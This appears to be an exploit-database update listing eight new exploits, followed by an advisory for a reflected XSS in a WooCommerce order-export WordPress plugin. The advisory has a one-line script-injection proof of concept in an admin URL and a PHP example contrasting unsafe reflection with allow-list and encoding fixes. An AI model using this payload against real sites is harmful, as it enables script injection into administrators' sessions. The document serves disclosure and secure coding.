
8 changes to exploits/shellcodes

Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)
Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control
Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
Budget and Expense Tracker System 1.0 - Arbitrary File Upload
Police Crime Record Management Project 1.0 - Time Based SQLi
# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 15/2/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
# Version: 3.1.7
# Tested on: Windows 10
# CVE: CVE-2021-24169

1. Description:
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
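The leading </script> in the proof of concept suggests the tab value is reflected inside an inline script block. The page does not show the plugin's code, so the following is an added example written under that assumption, not the plugin's source or its actual fix; the function names and the tab list are hypothetical. It puts the weak pattern beside a hardened one that allow-lists the tab name and encodes it for the script context.

```php
<?php
// Added illustration, not the plugin's source. Function names and the
// tab list are hypothetical; PHP 7.3+ for JSON_THROW_ON_ERROR.

const ALLOWED_TABS = ['export', 'settings', 'tools', 'help']; // constructed

// Weak form: the raw query value is concatenated into an inline script.
function render_tab_unsafe(array $query): string
{
    $tab = $query['tab'] ?? 'export';
    return "<script>var activeTab = '" . $tab . "';</script>";
}

// Encode a string as a JS literal that is safe inside <script>...</script>:
// <, >, &, ' and " become \uXXXX escapes, so the value can neither close
// the script element nor break out of the string literal.
function js_literal(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Hardened form: allow-list the tab name, then encode for the script context.
function render_tab_safe(array $query): string
{
    $tab = $query['tab'] ?? 'export';
    if (!is_string($tab) || !in_array($tab, ALLOWED_TABS, true)) {
        $tab = 'export'; // unknown or array-valued input falls back to the default
    }
    return '<script>var activeTab = ' . js_literal($tab) . ';</script>';
}

// The tab value from the proof of concept above.
$query = ['tab' => '</script><script>alert(1)</script>'];

echo render_tab_unsafe($query), PHP_EOL; // markup is reflected verbatim
echo render_tab_safe($query), PHP_EOL;   // falls back to the default tab
echo js_literal($query['tab']), PHP_EOL; // encoding alone, for free-form values
```

Inside WordPress the same two steps are usually written with sanitize_key() plus an allow-list check, and wp_json_encode() with the same JSON_HEX_* flags.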